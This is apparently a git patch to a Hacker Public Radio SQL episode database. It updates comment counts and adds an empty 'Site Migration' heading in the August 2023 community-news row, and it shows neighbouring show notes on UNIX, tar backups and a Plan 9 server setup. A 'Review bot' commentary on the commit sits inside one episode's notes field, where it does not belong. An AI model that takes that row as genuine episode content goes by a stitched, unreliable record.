From 025402a2518a168ae0c2a8f53953d74b9ba5b94c Mon Sep 17 00:00:00 2001 From: Ken Fallon Date: Sat, 2 Sep 2023 13:47:26 +0200 Subject: [PATCH] 2023-09-02_11-47-26Z_Saturday database changed --- sql/hpr.sql | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/sql/hpr.sql b/sql/hpr.sql index bcfd7d2..2c8b308 100644 --- a/sql/hpr.sql +++ b/sql/hpr.sql @@ -19977,7 +19977,7 @@ INSERT INTO `eps` (`id`, `date`, `title`, `duration`, `summary`, `notes`, `hosti (3665,'2022-08-19','UNIX Is Sublime',3586,'I talk about all of the reasons I love UNIX','

UNIX is sublime

\n
Or, \"how to use a computer without hating yourself for it in the morning\"
\n
Or, \"Unix is basically a simple operating system . . .\"
\n
Or, \"My weariness and disdain for computers grow with each additional unit of knowledge\"
\n
Or, \"Worse is better\"
\n

Origins

\n

UNIX is not Multics

\n

Multics = Multiplexed Information and Computer Service

\n

UNIX = Uniplexed Information and Computing Service

\n

The name \'UNIX\' is a pun on the name \'Multics\'. Multics was entirely too large and complicated to be useful so the boys at Bell Labs cooked up something smaller, less complicated, and easier to use.

\n
\n

Ancient emulation interlude

\n

How to run Multics in 2022.

\n

This wiki helped me emulate UNIXv5.

\n

And this one helped me emulate UNIXv7.

\n

These guys host ancient systems accessible via guest accounts over ssh.

\n
\n

\"Cool, but useless.\"

\n
\n
\n

I know almost nothing about Multics and I\'m not sure if it\'s even worth learning. This is about UNIX, not Multics. Maybe I\'ll come back to it.

\n

Philosophy, implementations, ducks

\n

When I think of \"UNIX\", I do not think of the trademark. Instead, I think of the Unix philosophy. and the general design principles, interface, and behavior of a UNIX system.

\n

A better way of thinking about \"UNIX\" is as something \"POSIX-like\" rather than \"AT&T\'s commercial UNIX\". Example: although Linux and GNU are overly complicated, they pass the duck test for being a UNIX. Pedigree or not, you know a nix when you see one.

\n

Also, when I say \"UNIX\", I mean \"Free UNIX\". I have no interest in proprietary implementations that only exist for the purpose of restricting users and disempowering/discouraging sysadmins from becoming self-reliant.

\n

So what is the philosophy?

\n\n

And additionally:

\n\n

Design

\n

10,000 Ft View

\n

UNIX is a multiuser time sharing networked operating system, running as an always online service. A UNIX system is a single mainframe computer running an operating system designed for multiple users to access concurrently over the network, equally (depending on implementation) sharing resources amongst the active users.

\n

In a traditional network setup, there is one mainframe UNIX machine with multiple dumb terminals connected to it over the network. None of the users touch the mainframe physically. Instead, they interact with it exclusively through their own dumb terms. These dumb terminals have minimal or no computing power of their own because all of the actual computation takes place on the mainframe. Built in networking is a given.

\n

As for the actual software running on the mainframe, it\'s quite simple to visualize. A Unix system is a flexible but organized stack of concepts, each depending on the concept below, all working together for the sole purpose of enabling the end user to play video games and watch videos online.

\n
       / user applications \\\n      /       shells        \\\n     /        daemons        \\\n    /       file systems      \\\n   /        kmods/drivers      \\\n  /           syscalls          \\\n /             kernel            \\\n/             hardware            \\\n
\n

In order to fully explain why UNIX is sublime, I will start from the bottom and work my way upward. Before I discuss the shell, I will explain the multiuser aspects of the system. Then, after a long arduous journey of verbosity, explain how to actually use the thing.

\n

Kernel

\n

The kernel is something the user rarely interacts with. It abstracts all the hard parts away from the user. No more poking random memory addresses to load a program from tape.

\n

Multitasking

\n

In order to support multiple users, resource sharing was implemented. When a user\'s process requests CPU time, it\'s put into a rotational queue along with the other requests for CPU time. Round robin style concurrency is one of the easiest to implement but most modern systems use a weighted model that prioritizes processes owned by specific users. Memory and disk space are typically assigned hard limits to prevent system crashes. \"Ask your sysadmin if you need more resources.\"

\n

Virtual Memory

\n

Abstracting memory management from users is almost necessary in a multitasking system. The kernel must be the arbiter of all. The most interesting thing about virtual memory is that it doesn\'t actually need to be a RAM stick, but can be a swap partition on a disk or even a remote cloud provider if you\'ve actually lost your mind. This type of flexibility improves system stability. Instead of a kernel panic when memory runs out, the kernel can de-prioritize nonessential or idle processes by sending them to swap space.

\n

Paged Memory (logical memory)

\n

No more fragmented memories! The kernel maintains a page table that maps logical locations to physical locations. Instead one continuous chunk of memory, the kernel divides memory into small sections called \"pages\". When allocating memory, the kernel might not give a process continuous pages. The advantage of a paged memory scheme further enables multiuser computing. Example: When you have a large program like a web browser open, the pages that contains the unfocused tabs can be swapped out to disk without stalling the entire browser.

\n

Programming Interface pt. 0 (syscalls, kmods, drivers)

\n

When a process requests a resource, it sends a syscall to the kernel. The kernel then responds to the system call. This allows for privilege separation. Does your web browser need direct access to all memory? What about all files? Do we even want to write assembly every time we want to access a file? Syscalls are dual purpose: abstraction and security.

\n

Kernel modules are dynamic \"extensions\" that give the kernel new features (typically hardware support). The ability to dynamically load/unload modules as hardware changes increases uptime because it means a new kernel doesn\'t need to be compiled, installed, and booted into every time we plug in a different peripheral.

\n

Filesystem

\n

Hierarchical structure

\n

A UNIX filesystem is hierarchical. Each directory contains files or other directories, each with a specific purpose. This type of organization makes it very easy to navigate and manage a system. Each child directory inherits ownership and permissions unless otherwise specified (see Access Control).

\n

In order to visualize this, I imagine a tree-like structure descending from the root directory, /. The tree(1) program shows this type of hierarchy.

\n

Virtual Filesystems (logical filesystem)

\n

The idea behind virtual filesystems is, again, abstraction. Using the concept of a virtual file system, multiple disks can be presented to the user and programmer as a single unified filesystem. This means mounted local disks, NFS shares, and even the contents of a CDROM are presented as if the files contained therein are \"just on the big hard drive\".

\n

Additionally, using bind mounts, a directory can be mounted onto another directory as if it were just another filesystem.

\n

The final interesting thing about virtual filesystems is the concept of a ramdisk: mounting a section of memory so that it can be used as if it was an ordinary directory. <--Shoot foot here.

\n

Everything is a file

\n

Well, almost everything is presented as if it were a file. This greatly simplifies programming.

\n

Prime example: /dev/urandom is a random entropy generator presented as a file, making it very simple for a programmer to implement seeded RNG in a program.

\n

Another example: The kernel translates mouse input into a data stream that can be opened as a file. The programmer only needs to read from /dev/mouse0 instead of writing hundreds of mouse drivers for a clicky GUI.

\n

Exercise 1: Try running this command then wiggling your mouse:

\n
# Linux\n$ sudo cat /dev/input/mouse0\n\n# FreeBSD\n$ sudo cat /dev/sysmouse\n
\n

Yet another example: the TTY is just a file. You can even print it to a text file using setterm(1) on Linux.

\n

Exercise 2:

\n
[user@fedora ~]$ sudo setterm --dump 3\n[user@fedora ~]$ cat screen.dump\n\nFedora Linux 36 (Workstation Edition)\nKernel 5.18.5-200.fc36.x86_64 on an x86_64 (tty3)\n\nfedora login: root\nPassword:\nLast login: Sat Jul 30 14:34:20 on tty3\n[root@fedora ~]# /opt/pfetch/pfetch\n        ,'''''.   root@fedora\n       |   ,.  |  os     Fedora Linux 36 (Workstation Edition)\n       |  |  '_'  host   XXXXXXXXXX ThinkPad T490\n  ,....|  |..     kernel 5.18.5-200.fc36.x86_64\n.'  ,_;|   ..'    uptime 20d 22h 40m\n|  |   |  |       pkgs   3910\n|  ',_,'  |       memory 6522M / 15521M\n '.     ,'\n   '''''\n\n[root@fedora ~]#\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n[user@fedora ~]$\n
\n

Links

\n

Yet another way of \"mounting\" a file or directory to another file or directory is linking. There are two types of links: hard links and symbolic links.

\n

On UNIX, files are indexed by inodes (index nodes). Using links, we can make \"shortcuts\" to files.

\n

Hard linking adds a \"new index\" to a file. They share an inode. If the original file is removed, the file persists in storage because the secondary file created by a hard link still exists. Think \"different name, same file\"

\n

Symlinks are like pointers. A symlink points to the original file instead of the inode. If you remove the original file, the symlink breaks because it points to a file that points to an inode rather than simply pointing to an inode.

\n

Using links, we can make files more convenient to access as if we are \"copying\" files without actually copying files.

\n

Filename extensions

\n

On a UNIX system, file extensions are arbitrary. UNIX determines file type by reading the file headers. The file tells you exactly what type of file it is (just read it). The entire system does not break when a file extension doesn\'t match the expected contents of the file.

\n

Extensions only matter when you wilfully associate with the microsoft users leaving issues on your software repos. \"Not my OS, not my issue, it\'s open source so fork it if you don\'t like it\"

\n

Multiuser (timesharing)

\n

See also: Multitasking.

\n

Exercise 3: attempt to use Windows like a multiuser operating system and get back to me when you have realized that any and all claims made by microsoft about how their \"multi user enterprise system\" is in any way capable of competing with a genuine multi-user UNIX system are false advertising.

\n

Users, Groups

\n

A multiuser system needs a way to manage users and categorize them for access control purposes. Every user has a single user account and belongs to 0 or more groups. Sorting users into groups at the time of account creation makes is significantly easier than granting/revoking permissions user-by-user. Additionally, using something like rctl(8) on FreeBSD allows a systems administrator to allocate resources to specific users, groups, or login classes (like groups).

\n

Daemons (services)

\n

On a UNIX system, every process is owned by a user. In the case of a service, the process is owned by a daemon account. Daemon accounts have limited permissions and make it possible to run persistent services as a non-root user.

\n

Access Control

\n

Since UNIX was designed to be a multiuser system, access control is required. We know about users, we know about groups, but what about permissions?

\n

There are three types of operations that can be done to a file: read, write, and execute. Who can the admin grant these permissions to? The Owner, the Group, and the Other (all). This type of access control is called discretionary access control because the owner of the file can modify files at their own discretion.

\n

Actually using the thing

\n

Programming interface Pt. 1 (data streams)

\n

All UNIX utilities worth using use 3 data streams:

\n\n

Shell

\n

The shell is how a user actually interacts with a UNIX system. It\'s a familiar interface that allows a human user to interact with a computer using real human language.

\n

Explicitly telling the computer to do is infinitely less agonizing than dealing with a computer that tries to do what it thinks you want it to do by interpreting input from a poorly designed, overly engineered interface.

\n

The shell, in addition to being an interactive interface, is also scriptable. Although math is a struggle, shell scripting is a fairly simple way of automating tasks. Taping together interoperable commands you already know makes everything easier. My favorite aspect about writing POSIX shell scripts is knowing that shell is a strongly, statically typed language where the only datatype is string.

\n

Problem that are difficult or messy to solve in shell usually mean it\'s time to write another small C program for your specific needs. Adding the new program into the shell pipeline is trivial.

\n

Pipes

\n

Pipes, the concept that makes UNIX so scriptable. A shell utility that follows the UNIX philosophy will have a non-captive interface, write uncluttered data to stdout, read from stdin, and error to stderr. The | pipe character instructs programs to send their stdout to the next stdin in the pipeline instead of printing to the terminal.

\n

All standard command line utilities are interoperable and can be easily attached like building blocks. \"Meta programming\" has never been easier.

\n

Pipes make it so that every UNIX program is essentially a filter. Sure, you could just use awk, but I prefer shell.

\n

Bonus:

\n\n

Summary:

\n

UNIX is a non-simple modular operating system designed for 1970s big iron mainframes but we love it too much to let it go. Compared to minimal hobbyist operating systems, UNIX is BIG. Compared to commercial operating systems, free UNIX is small. Maybe slightly more than minimum viable but the papercuts are mild enough to forgive.

\n

See Also:

\n

The UNIX-HATERS Handbook

\n',406,0,1,'CC-BY-SA','UNIX',0,0,1), (3657,'2022-08-09','Small time sysadmin',1568,'How I maintain my Linux Box, Part One.','
    \n
  1. Creating Backups.
  2. \n
\n\n
#!/bin/bash\n#License: GPL v3\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program.  If not, see <https://www.gnu.org/licenses/>.\n\n#Name: getoverhere.sh\n#Purpose:\n#Version: beta 0.07\n#Author: SGOTI (Some Guy On The Internet)\n#Date: Sat 29 Jan 2022 02:19:29 AM EST\n\n#variables:\nVAR_TBALL=\nVAR_TARGET=\nVAR_JUMP=\nVAR_VALUE=\n\n#start:\ncat << "EOT01"\nOptions:\n    email |"${HOME}/.thunderbird/"\n    jop |"${HOME}/Documents/joplin"\n    dots |"${HOME}/.bashrc .vimrc .bash_aliases"\nEOT01\n\necho -e "What do you want to backup? 
: \\c."\nread VAR_VALUE\n\ncase ${VAR_VALUE} in\n    "email" )\nVAR_TBALL="INSERT_EMAIL_NAME$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET="msgFilterRules.dat"\nVAR_JUMP="${HOME}/.thunderbird/*.default-release/ImapMail/imap.mail.yahoo.com/"\n    echo -e "Grabbing INSERT_EMAIL_NAME...\\n"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    sleep 1\n\nVAR_TBALL="INSERT_EMAIL_NAME$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET="msgFilterRules.dat"\nVAR_JUMP="${HOME}/.thunderbird/*.default-release/ImapMail/imap.gmail.com/"\n    echo -e "Grabbing INSERT_EMAIL_NAME...\\n"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    sleep 1\n\nVAR_TBALL="EMAIL_ARCHIVES$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET="Mail/"\nVAR_JUMP="${HOME}/.thunderbird/*.default-release/"\n    echo -e "Grabbing email EMAIL_ARCHIVES...\\n"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    echo -e "Creating List for ${VAR_TBALL}...\\n"\nls -lhAR --group-directories-first ${VAR_JUMP}${VAR_TARGET} > EMAIL_ARCHIVES$(date +%m-%d-%Y).txt\n    sleep 1\n\nVAR_TBALL="THUNDERBIRD_CALENDER$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET="calenders/"\nVAR_JUMP="${HOME}/Documents/"\n    echo -e "Grabbing email THUNDERBIRD_CALENDER...\\n"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    echo -e "Creating List for ${VAR_TBALL}...\\n"\nls -lhAR --group-directories-first ${VAR_JUMP}${VAR_TARGET} > THUNDERBIRD_CALENDER$(date +%m-%d-%Y).txt\n    sleep 1\n\nVAR_TBALL="THUNDERBIRD_ADDRESS_BOOK$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET="address-book/"\nVAR_JUMP="${HOME}/Documents/"\n    echo -e "Grabbing ${VAR_TARGET}...\\n"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    echo -e "Creating List for ${VAR_TBALL}...\\n"\nls -lhAR --group-directories-first ${VAR_JUMP}${VAR_TARGET} > THUNDERBIRD_ADDRESS_BOOK$(date +%m-%d-%Y).txt\n    sleep 1\n\nVAR_TBALL="THUNDERBIRD_ALL$(date 
+%m-%d-%Y).tar.gz"\nVAR_TARGET=".thunderbird/"\nVAR_JUMP="${HOME}/"\n    echo -e "Grabbing ${VAR_TARGET}...\\n"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    echo -e "Creating List for ${VAR_TBALL}...\\n"\nls -lhAR --group-directories-first ${VAR_JUMP}${VAR_TARGET} > THUNDERBIRD_ALL$(date +%m-%d-%Y).txt ;;\n\n    "jop" )\nVAR_TBALL="JOPLIN$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET="joplin/"\nVAR_JUMP="${HOME}/Documents/"\n    echo "Grabbing ${VAR_TARGET}"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    sleep 1\n    echo -e "Creating List for ${VAR_TBALL}...\\n"\nls -lhAR --group-directories-first ${VAR_JUMP}${VAR_TARGET} > JOPLIN$(date +%m-%d-%Y).txt ;;\n\n    "dots" )\nVAR_TBALL="dots$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET=".bashrc .vimrc .bash_aliases"\nVAR_JUMP="${HOME}/"\n    echo "Grabbing ${VAR_TARGET}"\ntar -v -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET} ;;\n\n    * )\n    echo "Good Heavens..." ;;\nesac\nexit;\n
\n
\n
    \n
  1. Restoring from backups.
  2. \n
\n\n
VAR_TBALL="EMAIL_ARCHIVES*.tar.gz"\nVAR_JUMP="${HOME}/.thunderbird/*.default-release/"\n    echo -e "Restoring EMAIL_ARCHIVES...\\n"\ntar --extract --directory= ${VAR_JUMP} --file ${VAR_TBALL}\n    echo -e "EMAIL_ARCHIVES restored.\\n"\n
\n',391,0,0,'CC-BY-SA','sysadmin, system maintenance, tar, backups',0,0,1), (3664,'2022-08-18','Secret hat conversations',1070,'You\'ll need your tin hat for this one.','

The Tin Foil Hat often worn in the belief or hope that it shields the brain from threats such as electromagnetic fields, mind control, and mind reading.

\n
    \n
  1. Proper hat construction video. Also includes the “why” along with the “how”.
  2. \n
  3. Proper hat construction music. Just something to keep you focused.
  4. \n
\n
\n

FCC Caller ID Spoofing info: Spoofing is when a caller deliberately falsifies the information transmitted to your caller ID display to disguise their identity.

\n

FCC Call Blocking info: Call blocking is a tool used by phone companies to stop illegal and unwanted calls from reaching your phone. A second annual FCC report released in June 2021 found that many voice service providers and third-party analytics companies are improving their call blocking and labeling services and use new data to better detect robocalls. Billions of unwanted calls to American consumers are being blocked each year.

\n

The PinePhone Pro Explorer Edition is aimed at Linux developers with an extensive knowledge of embedded systems and/or experience with mobile Linux.

\n

Time-based one-time password (TOTP) is a computer algorithm that generates a one-time password (OTP) that uses the current time as a source of uniqueness. As an extension of the HMAC-based one-time password algorithm (HOTP), it has been adopted as Internet Engineering Task Force (IETF) standard RFC 6238.

\n

Matrix is an open standard for interoperable, decentralised, real-time communication over IP.

\n
\n

Password Managers: Used by Some Guy On The Internet.
\nBitwarden
\nKeePassXC

\n
\n',391,0,1,'CC-BY-SA','Tin hat, call spoofing',0,0,1), -(3936,'2023-09-04','HPR Community News for August 2023',0,'HPR Volunteers talk about shows released and comments posted in August 2023','\n\n

New hosts

\n

\nWelcome to our new host:
\n\n Fred Black.\n

\n\n

Last Month\'s Shows

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
IdDayDateTitleHost
3912Tue2023-08-01Emergency Show: Biltong and RooibosShane Shennan
3913Wed2023-08-02Lurking Prion Q and ALurking Prion
3914Thu2023-08-03how to deal with blistersdnt
3915Fri2023-08-04Why the hell is my audio clipping?MrX
3916Mon2023-08-07HPR Community News for July 2023HPR Volunteers
3917Tue2023-08-08Response to \"Permission Tickets\" by oneofspoonsdnt
3918Wed2023-08-09Emacs package curation, part 3dnt
3919Thu2023-08-10How I hacked my voicetuturto
3920Fri2023-08-11RV Trip 2022-2023: Southeast USAhuka
3921Mon2023-08-14HPR AudioBook Club 23 - John Carter of Mars (Books 1-3)HPR_AudioBookClub
3922Tue2023-08-15Silent KeyTrey
3923Wed2023-08-16Meal preparation.Some Guy On The Internet
3924Thu2023-08-17Mass Quick Tips for August 2023operat0r
3925Fri2023-08-18Uncommon tools and social mediaDaniel Persson
3926Mon2023-08-21Karate Do: An OverviewHipernike
3927Tue2023-08-22Audacity Update 20230702Ahuka
3928Wed2023-08-23RE: Klaatu.Some Guy On The Internet
3929Thu2023-08-24Some experiences with different notes appsLee
3930Fri2023-08-25Playing Civilization II Test of TimeAhuka
3931Mon2023-08-28What Instrument was played in hpr3905?Fred Black
3932Tue2023-08-29Short introduction to inxifolky
3933Wed2023-08-30Planning for a planner.Some Guy On The Internet
3934Thu2023-08-31Crusader Kings IItuturto
\n\n

Comments this month

\n\n

Note to Volunteers: Comments marked in green were read in the last\nCommunity News show and should be ignored in this one.

These are comments which have been made during the past month, either to shows released during the month or to past shows.\nThere are 20 comments in total.

\n

Past shows

\n

There are 5 comments on\n5 previous shows:

\n

Updated on 2023-08-31 10:33:59

\n

This month\'s shows

\n

There are 15 comments on 8 of this month\'s shows:

\n\n\n

Mailing List discussions

\n

\nPolicy decisions surrounding HPR are taken by the community as a whole. This\ndiscussion takes place on the Mail List which is open to all HPR listeners and\ncontributors. The discussions are open and available on the HPR server under\nMailman.\n

\n

The threaded discussions this month can be found here:

\nhttps://lists.hackerpublicradio.com/pipermail/hpr/2023-August/thread.html\n\n\n

Events Calendar

\n

With the kind permission of LWN.net we are linking to\nThe LWN.net Community Calendar.

\n

Quoting the site:

\n
This is the LWN.net community event calendar, where we track\nevents of interest to people using and developing Linux and free software.\nClicking on individual events will take you to the appropriate web\npage.
\n\n

Any other business

\n\n\n\n',159,47,1,'CC-BY-SA','Community News',0,0,1), +(3936,'2023-09-04','HPR Community News for August 2023',0,'HPR Volunteers talk about shows released and comments posted in August 2023','\n\n

New hosts

\n

\nWelcome to our new host:
\n\n Fred Black.\n

\n\n

Last Month\'s Shows

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
IdDayDateTitleHost
3912Tue2023-08-01Emergency Show: Biltong and RooibosShane Shennan
3913Wed2023-08-02Lurking Prion Q and ALurking Prion
3914Thu2023-08-03how to deal with blistersdnt
3915Fri2023-08-04Why the hell is my audio clipping?MrX
3916Mon2023-08-07HPR Community News for July 2023HPR Volunteers
3917Tue2023-08-08Response to \"Permission Tickets\" by oneofspoonsdnt
3918Wed2023-08-09Emacs package curation, part 3dnt
3919Thu2023-08-10How I hacked my voicetuturto
3920Fri2023-08-11RV Trip 2022-2023: Southeast USAhuka
3921Mon2023-08-14HPR AudioBook Club 23 - John Carter of Mars (Books 1-3)HPR_AudioBookClub
3922Tue2023-08-15Silent KeyTrey
3923Wed2023-08-16Meal preparation.Some Guy On The Internet
3924Thu2023-08-17Mass Quick Tips for August 2023operat0r
3925Fri2023-08-18Uncommon tools and social mediaDaniel Persson
3926Mon2023-08-21Karate Do: An OverviewHipernike
3927Tue2023-08-22Audacity Update 20230702Ahuka
3928Wed2023-08-23RE: Klaatu.Some Guy On The Internet
3929Thu2023-08-24Some experiences with different notes appsLee
3930Fri2023-08-25Playing Civilization II Test of TimeAhuka
3931Mon2023-08-28What Instrument was played in hpr3905?Fred Black
3932Tue2023-08-29Short introduction to inxifolky
3933Wed2023-08-30Planning for a planner.Some Guy On The Internet
3934Thu2023-08-31Crusader Kings IItuturto
\n\n

Comments this month

\n\n

Note to Volunteers: Comments marked in green were read in the last\nCommunity News show and should be ignored in this one.

These are comments which have been made during the past month, either to shows released during the month or to past shows.\nThere are 21 comments in total.

\n

Past shows

\n

There are 5 comments on\n5 previous shows:

\n

Updated on 2023-09-01 15:05:10

\n

This month\'s shows

\n

There are 16 comments on 8 of this month\'s shows:

\n\n\n

Mailing List discussions

\n

\nPolicy decisions surrounding HPR are taken by the community as a whole. This\ndiscussion takes place on the Mail List which is open to all HPR listeners and\ncontributors. The discussions are open and available on the HPR server under\nMailman.\n

\n

The threaded discussions this month can be found here:

\nhttps://lists.hackerpublicradio.com/pipermail/hpr/2023-August/thread.html\n\n\n

Events Calendar

\n

With the kind permission of LWN.net we are linking to\nThe LWN.net Community Calendar.

\n

Quoting the site:

\n
This is the LWN.net community event calendar, where we track\nevents of interest to people using and developing Linux and free software.\nClicking on individual events will take you to the appropriate web\npage.
\n\n

Any other business

\n

Site Migration

\n\n\n\n',159,47,1,'CC-BY-SA','Community News',0,0,1), (3666,'2022-08-22','One Weird Trick',997,'I talk about getting into or advancing in cybersecurity & how keyboards could trick malware.','

In this episode, I talk about getting in to the field of cybersecurity or moving up in the field. I also talk about how keyboards could keep malware from going Boom on your system.

\n

Links:

\n\n',405,74,1,'CC-BY-SA','cybersecurity,security,EvilSteve,malware, career',0,0,1), (3669,'2022-08-25','My First Podcast: My Journey into the Computer World',1207,'How I was introduced into computers, Linux, robotics, programming, cibersecurity and more...','

Milestones in my Journey

\n
    \n
  1. Studied Windows office and played online games
  2. \n
  3. Electronics
  4. \n
  5. Programming with Scratch
  6. \n
  7. Studied Javascript with Khan Academy
  8. \n
  9. Used Processing
  10. \n
  11. Learned Arduino and robotics
  12. \n
  13. Programmed with Visual Studio Code
  14. \n
  15. Learned Git
  16. \n
  17. Learned Windows Batch, VBS, registry, and others
  18. \n
  19. Introduction to Linux and disks with Tails
  20. \n
  21. Installation of Linux mint
  22. \n
  23. Installation of Debian
  24. \n
  25. Learned Apt, sudo, and other commands
  26. \n
  27. Discovered the Raspberry Pi
  28. \n
  29. Learned ssh, vnc, servers and networking with the Raspberry Pi
  30. \n
  31. Received a Thinkpad laptop and installed on it Bodhi Linux, Linux Lite and Alpine Linux
  32. \n
  33. Learned about erasure, recovery and encryption of data
  34. \n
  35. Learned more about Linux (Screen, network configuration, emacs, programming in C)
  36. \n
  37. Discovered Nethack and Open Adventure console games
  38. \n
  39. Studied hacking and pentesting
  40. \n
  41. Helped a company with its computers and learned from it guys
  42. \n
  43. Introduction to Python and BSD
  44. \n
\n',410,29,0,'CC-BY-SA','linux, programming, cibersecurity, robotics, hardware',0,0,1), (3678,'2022-09-07','\"Stupid Users\" ... no, not those users, the other \"stupid users\"',907,'Brady & I discuss stupid things done by those of us who really should know better.','

In this week\'s episode, I chat with R. Brady Frost about the little plumber vs the gigantic rock. Then we move in to a discussion about the fallacy of stupid users with some great stories of stupid things done by those of us who really should know better. The moral of the story, is that we are all human and nothing will ever change that. Instead, we need to be prepared for when humans are human.

\n

Links:

\n\n',405,74,1,'CC-BY-SA','cybersecurity,security,EvilSteve,users,stupid human tricks,customer service',0,0,1), @@ -19996,7 +19996,7 @@ INSERT INTO `eps` (`id`, `date`, `title`, `duration`, `summary`, `notes`, `hosti (3684,'2022-09-15','Wake on Lan',602,'Wake on Lan mother board feature','
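Review bot: the commit message "2023-09-02_11-47-26Z_Saturday database changed" does not say what changed, and in this hunk (@@ -19977) the only edits to row 3936 ('HPR Community News for August 2023') are the comment counts (20 to 21 in total, 15 to 16 on this month's shows), the "Updated on" stamp (2023-08-31 10:33:59 to 2023-09-01 15:05:10) and a new "Site Migration" heading under "Any other business"; a message naming the row and the reason (one new comment, one new AOB item) would make this dump auditable later. The new counts are internally consistent (5 on previous shows plus 16 on this month's shows equals 21). The "Site Migration" heading is added with nothing beneath it; if it is a placeholder to be filled in before the show is recorded, note that in the commit, otherwise the published notes will carry an empty section.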

WakeOnLAN (WOL)

\n

From wiki.wireshark.org

\n
\n

WakeOnLAN is the protocol name given to the so-called Magic Packet technology, developed by AMD and Hewlett Packard for remotely waking up a remote host that may have been automatically powered-down because of its power management features. Although power management allows companies and individuals to cut power usage costs, it presents a problem for IT departments especially in being able to quickly and efficiently remotely manage PC\'s, especially during off-hours operation when those PC\'s are most likely to be in a suspended or standby state, assuming power management features are enabled.

\n
\n',129,0,0,'CC-BY-SA','Wake on Lan, wol',0,0,1), (3686,'2022-09-19',' Followup for HPR3675: Clarifications on the path traversal bug',2335,'installing a plan 9 cpu+web server, namespaces to the rescue, web app security models and more','

Followup for HPR3675: Installing a Plan 9 CPU server, Plan 9 web server, clarifications on the path traversal bug, private namespaces to the rescue, web application security models

\n
\n

Installing Plan 9 with libvirt

\n
[root@localhost]# virt-install -n 9pwn \\\n--description "pre-patched rc-httpd" \\\n--osinfo=unknown \\\n--memory=4096 \\\n--vcpus=4 \\\n--disk path=/var/lib/libvirt/images/9pwn.qcows,bus=virtio,size=10 \\\n--graphics spice \\\n--cdrom ~/Downloads/9front-8593.acc504c319a4b4188479cfa602e40cb6851c0528.amd64.iso \\\n--network bridge=virbr0\n\n[root@localhost]# virt-viewer 9pwn\n
\n

How I find the IP of my guests and add it to my /etc/hosts for faster access.

\n
[root@localhost]# virsh domiflist 9pwn\n Interface   Type     Source   Model   MAC\n----------------------------------------------------------\n vnet3       bridge   virbr0   e1000   52:54:00:43:8a:50\n\n[root@localhost]# arp -e | grep 52:54:00:43:8a:50\n192.168.122.20           ether   52:54:00:43:8a:50   C                     virbr0\n\n[root@localhost]# echo cirno 192.168.122.20 >> /etc/hosts\n
\n

Proceed as normal with a 9 installation

\n
\n

Set up CPU server with rc-httpd and werc

\n

I wrote about configuring a CPU server and also mirrored the notes at my 9front webserver containing a mirror of my plan 9 related things (using self-signed certs but it\'s fine) I\'ve snarfed+pasted it here for the sake of completeness and modified it slightly so that it\'s more accessible for other people. I\'ve also revised these notes so that they\'re less-broken. I may or may not update them.

\n

I\'m using 9front for this. It has more secure authentication protocols when it comes to remotely connecting.

\n

Configuring a CPU server

\n

Add users to file server

\n

Connect to the file server and add a new user called <ExampleUser> who is in the groups sys, adm, and upas

\n
term% con -C /srv/cwfs.cmd\nnewuser <ExampleUser>\nnewuser sys +<ExampleUser>\nnewuser adm +<ExampleUser>\nnewuser upas +<ExampleUser>\n
\n

Reboot and set user=<ExampleUser> when prompted at boot time.

\n

Configure user\'s environment

\n

This is similar to cp -r /etc/skel /home/<ExampleUser> on a UNIX system.

\n
/sys/lib/newuser\n
\n

Configure headless booting

\n

Mount the boot partition:

\n
term% 9fs 9fat\n
\n

edit the boot config, /n/9fat/plan9.ini

\n
